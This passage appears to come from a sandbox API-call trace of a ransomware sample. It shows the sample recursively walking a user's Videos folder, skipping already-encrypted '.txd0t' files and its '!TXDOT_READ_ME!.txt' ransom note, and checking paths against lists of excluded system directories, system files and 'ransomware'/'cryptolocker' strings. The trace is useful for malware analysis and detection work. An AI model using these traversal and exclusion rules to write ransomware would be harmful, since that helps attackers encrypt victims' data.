ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0119.915] StrCmpW (psz1="SendTo", psz2=".") returned 1 [0119.915] StrCmpW (psz1="SendTo", psz2="..") returned 1 [0119.915] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0119.915] StrCmpW (psz1="Start Menu", psz2=".") returned 1 [0119.915] StrCmpW (psz1="Start Menu", psz2="..") returned 1 [0119.915] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0119.915] StrCmpW (psz1="Templates", psz2=".") returned 1 [0119.915] StrCmpW (psz1="Templates", psz2="..") returned 1 [0119.915] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x52e1f316, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e1f316, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0119.915] StrCmpW (psz1="Videos", psz2=".") returned 1 [0119.915] StrCmpW (psz1="Videos", psz2="..") returned 1 [0119.915] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0119.915] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0119.915] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Videos", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0119.915] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\windows\\system32\\") returned 0x0 [0119.915] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.915] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\windows\\system\\") returned 0x0 [0119.915] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.915] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.915] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\appdata\\local\\") returned 0x0 [0119.915] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.915] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.915] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.915] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\boot\\") returned 0x0 [0119.915] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\perflogs\\") returned 0x0 [0119.915] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\programdata\\") returned 0x0 [0119.915] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\drivers\\") returned 0x0 [0119.916] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\wsus\\") returned 0x0 [0119.916] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.916] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.916] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="crypt_detect") returned 0x0 [0119.916] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="cryptolocker") returned 0x0 [0119.916] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="ransomware") returned 0x0 [0119.916] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="C:\\WINDOWS") returned 0x0 [0119.916] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.916] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos", lpSrch="C:\\Program Files") returned 0x0 [0119.916] GetProcessHeap () returned 0xe30000 [0119.916] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ae) returned 0xef3600 [0119.916] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0119.916] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\*", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\*") returned="C:\\Users\\FD1HVy\\Videos\\*" [0119.916] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x52e1f316, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e1f316, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1b30 [0119.916] StrCmpW (psz1=".", psz2=".") returned 0 [0119.916] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x52e1f316, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e1f316, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.916] StrCmpW (psz1="..", psz2=".") returned 1 [0119.916] StrCmpW (psz1="..", psz2="..") returned 0 [0119.916] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a6559f, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x52a6559f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52a8b6c2, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.916] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.916] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.916] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0119.916] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0119.916] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\!TXDOT_READ_ME!.txt" [0119.916] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.916] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.916] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.916] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.916] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.916] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.916] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.917] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.917] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.917] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.917] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.917] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.917] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.917] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.917] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.917] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.917] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x827a210, ftCreationTime.dwHighDateTime=0x1d5e8fe, ftLastAccessTime.dwLowDateTime=0xb0bf66b0, ftLastAccessTime.dwHighDateTime=0x1d5e719, ftLastWriteTime.dwLowDateTime=0x52a6559f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18fa8, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="42OnoQ2VRBixgPOTlYl.avi.txd0t", cAlternateFileName="42ONOQ~1.TXD")) returned 1 [0119.917] StrCmpW (psz1="42OnoQ2VRBixgPOTlYl.avi.txd0t", psz2=".") returned 1 [0119.917] StrCmpW (psz1="42OnoQ2VRBixgPOTlYl.avi.txd0t", psz2="..") returned 1 [0119.917] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0119.917] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0119.917] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="42OnoQ2VRBixgPOTlYl.avi.txd0t", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi.txd0t" [0119.917] PathFindExtensionW (pszPath="42OnoQ2VRBixgPOTlYl.avi.txd0t") returned=".txd0t" [0119.917] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.917] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.917] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.917] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.917] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f2440, ftCreationTime.dwHighDateTime=0x1d5e778, ftLastAccessTime.dwLowDateTime=0x52ab196d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52ab196d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="E10w7BI-yN9p", cAlternateFileName="E10W7B~1")) returned 1 [0119.917] StrCmpW (psz1="E10w7BI-yN9p", psz2=".") returned 1 [0119.917] StrCmpW (psz1="E10w7BI-yN9p", psz2="..") returned 1 [0119.917] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0119.917] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0119.917] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="E10w7BI-yN9p", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0119.917] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\windows\\system32\\") returned 0x0 [0119.917] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.917] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\windows\\system\\") returned 0x0 [0119.917] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.917] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.917] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\appdata\\local\\") returned 0x0 [0119.917] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.917] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.917] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.918] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\boot\\") returned 0x0 [0119.918] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\perflogs\\") returned 0x0 [0119.918] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\programdata\\") returned 0x0 [0119.918] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\drivers\\") returned 0x0 [0119.918] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\wsus\\") returned 0x0 [0119.918] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.918] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.918] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="crypt_detect") returned 0x0 [0119.918] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="cryptolocker") returned 0x0 [0119.918] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="ransomware") returned 0x0 [0119.918] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="C:\\WINDOWS") returned 0x0 [0119.918] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.918] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="C:\\Program Files") returned 0x0 [0119.918] GetProcessHeap () returned 0xe30000 [0119.918] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c8) returned 0xed39f8 [0119.918] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0119.918] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", psz2="\\*", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\*") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\*" [0119.918] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f2440, ftCreationTime.dwHighDateTime=0x1d5e778, ftLastAccessTime.dwLowDateTime=0x52ab196d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52ab196d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1cf0 [0119.918] StrCmpW (psz1=".", psz2=".") returned 0 [0119.918] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f2440, ftCreationTime.dwHighDateTime=0x1d5e778, ftLastAccessTime.dwLowDateTime=0x52ab196d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52ab196d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.918] StrCmpW (psz1="..", psz2=".") returned 1 [0119.918] StrCmpW (psz1="..", psz2="..") returned 0 [0119.918] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a8b6c2, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x52a8b6c2, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52ab196d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.918] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.918] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.918] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0119.918] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", psz2="\\", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\" [0119.918] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\!TXDOT_READ_ME!.txt" [0119.919] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.919] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.919] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.919] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.919] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.919] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.919] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.919] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.919] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.919] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.919] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.919] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.919] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.919] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.919] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.919] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.919] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68cd7160, ftCreationTime.dwHighDateTime=0x1d5ed3d, ftLastAccessTime.dwLowDateTime=0x3b1202a0, ftLastAccessTime.dwHighDateTime=0x1d5ea35, ftLastWriteTime.dwLowDateTime=0x52a8b6c2, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x853f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="cDQNx.mp4.txd0t", cAlternateFileName="CDQNXM~1.TXD")) returned 1 [0119.919] StrCmpW (psz1="cDQNx.mp4.txd0t", psz2=".") returned 1 [0119.919] StrCmpW (psz1="cDQNx.mp4.txd0t", psz2="..") returned 1 [0119.919] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0119.919] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", psz2="\\", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\" [0119.919] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\", psz2="cDQNx.mp4.txd0t", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4.txd0t" [0119.919] PathFindExtensionW (pszPath="cDQNx.mp4.txd0t") returned=".txd0t" [0119.919] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.919] FindNextFileW (in: hFindFile=0xec1cf0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ac050, ftCreationTime.dwHighDateTime=0x1d5e818, ftLastAccessTime.dwLowDateTime=0x52dacb88, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52dacb88, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="YD6Z6S-cuGg", cAlternateFileName="YD6Z6S~1")) returned 1 [0119.919] StrCmpW (psz1="YD6Z6S-cuGg", psz2=".") returned 1 [0119.919] StrCmpW (psz1="YD6Z6S-cuGg", psz2="..") returned 1 [0119.919] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0119.919] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", psz2="\\", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\" [0119.919] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\", psz2="YD6Z6S-cuGg", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0119.919] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\windows\\system32\\") returned 0x0 [0119.919] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.919] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\windows\\system\\") returned 0x0 [0119.919] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.919] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.920] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\appdata\\local\\") returned 0x0 [0119.920] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.920] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.920] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\inetpub\\logs\\") returned 